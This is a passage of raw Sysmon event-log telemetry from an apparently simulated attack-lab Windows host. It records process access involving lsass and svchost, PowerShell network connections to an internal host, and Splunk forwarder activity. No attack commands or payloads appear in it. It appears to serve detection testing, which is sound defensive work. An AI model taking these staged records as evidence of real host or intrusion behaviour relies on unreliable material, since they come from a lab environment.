indows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341674Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.173{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341673Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.173{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341672Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:56.173{B81B27B7-4012-611D-0B00-00000000C801}6361624C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035341707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:23.637{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52330-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:57.226{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=28399459A9D19BE35280739A27F61C50,SHA256=578FFE4406BAA8BDD8D82AB68247F2789A3638A4CDD754A4D9AFB4E7B648A78F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:57.195{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21484B63936A3B5713928E091D04606F,SHA256=87AD52DE5B034CA95D12BB3C2F067E803F8C7A763FC3DDB040FC6809EA646A1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:57.195{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A5D94D0480F8E7BC6392A60948BB8E63,SHA256=343132604069621C1CD64BF1CC438FCB44FA82213651036B0EA6A0E9B4555E87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:57.190{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C24D21A834C550EF1ABD54E11C5994FF,SHA256=65F5DBE63DD23D4AEB09A07E9D3FA2771B39BCB0E9C37D77FEBD9FF425CA899F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:58.199{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93B5AB6F6A218D7613B99859B1203E3D,SHA256=506E26193AAC6DE4235049010CC936A644D8219A115947BE095EB872CC72E580,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:58.100{B81B27B7-4013-611D-1600-00000000C801}11965016C:\Windows\system32\svchost.exe{B81B27B7-71FE-613B-18B4-03000000C801}3448C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+2dbe|C:\Windows\system32\wbem\wmiprvsd.dll+155e9|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+2227|C:\Windows\system32\wbem\wbemcore.dll+13f4|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:58.084{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FE-613B-18B4-03000000C801}3448C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:58.068{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-71FE-613B-18B4-03000000C801}3448C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:58.068{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-71FE-613B-18B4-03000000C801}3448C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035341715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:59.215{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E8BE0C34F7D955DBE23DFF29CE8C8B2,SHA256=1747BE6B6F5197C804A7F282F69EB88C4BDAA09E9EFF0AE903E3305C6D936D1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:55:59.114{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21484B63936A3B5713928E091D04606F,SHA256=87AD52DE5B034CA95D12BB3C2F067E803F8C7A763FC3DDB040FC6809EA646A1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:24.106{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52331-false10.0.1.12-8000- 23542300x800000000000000035341716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:00.246{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C34E3FE42AEC1806C748E520DA54EED6,SHA256=C3FAE846F070B14E67F43BAA2E3D748F45914B093E9843EB51550F4C1B6314DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:01.263{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C55734760FB4972C3CE87BD1FF8BAF8C,SHA256=E1F6566BE5CA90C45F58DACBE5087A8813E161A49AE48311926C88E22ED9EC90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:02.647{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A88114EF1791202BA12521A89E82F7EC,SHA256=F4673B26D66DC57F721D4FF37EB48556DC8760AA63708D25CDC080883ED955F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:02.285{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7276F3679BEF535C07DCA6512FB5924C,SHA256=17339248DFAB98C5F18A2895CE0D6865C34783B25CE3AA262CEC00066D76C0D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341721Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:03.299{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC23E758943CEDFCDBC53048D1DE2489,SHA256=A4FF4B463D8328AC42689E51B055B59DE25FE6E4151159E60BB3C9C2F5294B5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341720Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:28.642{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52332-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035341740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.766{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7204-613B-1AB4-03000000C801}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.763{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.763{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.763{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.763{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.762{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7204-613B-1AB4-03000000C801}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.745{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7204-613B-1AB4-03000000C801}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.746{B81B27B7-7204-613B-1AB4-03000000C801}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.345{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=117FBC0D9039271B271725FF87E9E4EC,SHA256=0104F2C629DDBF0578FF13D3D4735AF69ED8EC8FC04858FD738146F4176ECAF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.283{B81B27B7-7204-613B-19B4-03000000C801}64442912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035341730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:29.180{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52333-false10.0.1.12-8000- 10341000x800000000000000035341729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.067{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7204-613B-19B4-03000000C801}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.067{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 